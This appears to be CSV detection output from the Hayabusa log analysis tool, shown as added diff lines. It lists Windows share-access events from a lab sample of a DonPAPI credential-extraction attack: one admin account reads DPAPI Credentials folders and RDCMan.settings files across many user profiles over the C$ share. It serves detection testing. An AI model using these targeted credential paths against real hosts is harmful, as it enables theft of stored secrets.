+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
